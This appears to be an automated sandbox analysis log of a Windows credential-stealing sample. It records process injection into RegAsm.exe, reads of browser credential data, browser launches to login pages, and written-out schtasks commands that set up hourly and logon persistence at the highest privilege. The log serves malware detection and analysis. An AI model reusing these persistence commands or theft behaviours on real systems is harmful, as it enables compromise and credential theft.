File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1416:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5868
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4552:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2036:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2632:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\rage131MP.tmp

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe, 00000000.00000002.2084693372.00000000043F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe, 00000000.00000002.2084693372.00000000043F5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: KvHrxJ77cmUgLogin Data.2.dr, Ei8DrAmaYu9KLogin Data.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

ReversingLabs: Detection: 23%

Source: RegAsm.exe

String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe "C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe "C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe"
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.youtube.com/
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.facebook.com/login
Source: unknown	Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://accounts.google.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 --field-trial-handle=2324,i,2541819260191282002,938598577275048364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1888,i,5407564702306654445,10850688961270417415,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1976,i,13067442516428966182,10510495334177241877,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/login
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2088,i,9284688159329358542,7565992651462353756,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2080,i,6539887644468832511,10903315424592384845,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2104,i,14647974237917707437,3396227101640439639,262144 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 2376
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2024,i,5041607828718283965,3196036969284588987,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6444 --field-trial-handle=2024,i,5041607828718283965,3196036969284588987,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6620 --field-trial-handle=2024,i,5041607828718283965,3196036969284588987,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Process created: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe "C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe"
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com --attempting-deelevation
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe "C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe "C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Process created: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe "C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.youtube.com/	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.facebook.com/login	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://accounts.google.com/	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/login	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/login	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1888,i,5407564702306654445,10850688961270417415,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2340 --field-trial-handle=2324,i,2541819260191282002,938598577275048364,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1976,i,13067442516428966182,10510495334177241877,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2088,i,9284688159329358542,7565992651462353756,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2080,i,6539887644468832511,10903315424592384845,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=2104,i,14647974237917707437,3396227101640439639,262144 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2024,i,5041607828718283965,3196036969284588987,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6444 --field-trial-handle=2024,i,5041607828718283965,3196036969284588987,262144 /prefetch:8
